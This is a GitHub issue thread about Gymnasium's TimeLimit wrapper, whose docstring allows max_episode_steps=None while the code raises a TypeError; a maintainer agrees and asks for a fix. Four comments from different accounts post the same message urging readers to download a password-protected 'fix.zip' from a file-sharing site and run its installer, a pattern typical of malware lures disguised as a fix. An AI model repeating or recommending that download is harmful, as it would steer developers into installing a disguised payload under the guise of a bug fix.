### ISSUE TITLE
[Bug Report] Possibly outdated docstring for TimeLimit max_episode_steps

### ISSUE THREAD

**Issue by troiganto** [Farama-Foundation/Gymnasium#1147]
### Describe the bug

If you look at the docstring for `TimeLimit`, it says that the `max_episode_steps` argument may be None. However, neither the type annotation nor the wrapper's logic take this into account.

https://github.com/Farama-Foundation/Gymnasium/blob/52b6878618cf54ef1133342e4e34bb37d0122511/gymnasium/wrappers/common.py#L90-L100

### Code example

```shell
from typing import cast
from unittest.mock import Mock

from gymnasium import Env
from gymnasium.wrappers import TimeLimit

env = cast(Env, Mock(Env))
env.step.return_value = None, float("nan"), False, False, {}
env = TimeLimit(env, max_episode_steps=None)
env.reset()
env.step(None)

which raises:
```
Traceback (most recent call last):
  File "[…].py", line 11, in <module>
    env.step(None)
  File "[…]/gymnasium/wrappers/time_limit.py", l
ine 60, in step
    if self._elapsed_steps >= self._max_episode_steps:
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: '>=' not supported between instances of 'int' and 'NoneType'
```
```

### System info

- gymnasium 0.29.1
- installed via Pip
- OS is Fedora 40
- Python 3.12.4

### Additional context

IMO it's both fine to drop support for `max_episode_steps=None` or to adjust the code so that it reads the info from `env.spec`. I wanted to raise the issue though before submitting a PR and possibly fixing it in the wrong way

### Checklist

- [X] I have checked that there is no similar [issue](https://github.com/Farama-Foundation/Gymnasium/issues) in the repo

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pseudo-rnd-thoughts** [comment]
@troiganto Thanks for the issue, yes you are correct. 
This should be updated and to include an assert within the `__init__` that the `max_episode_steps` is integer and greater than zero. 

Would you be able to make a PR for this? 
Also could you add a test for this?

**Comment by troiganto** [comment]
Done and done :saluting_face:
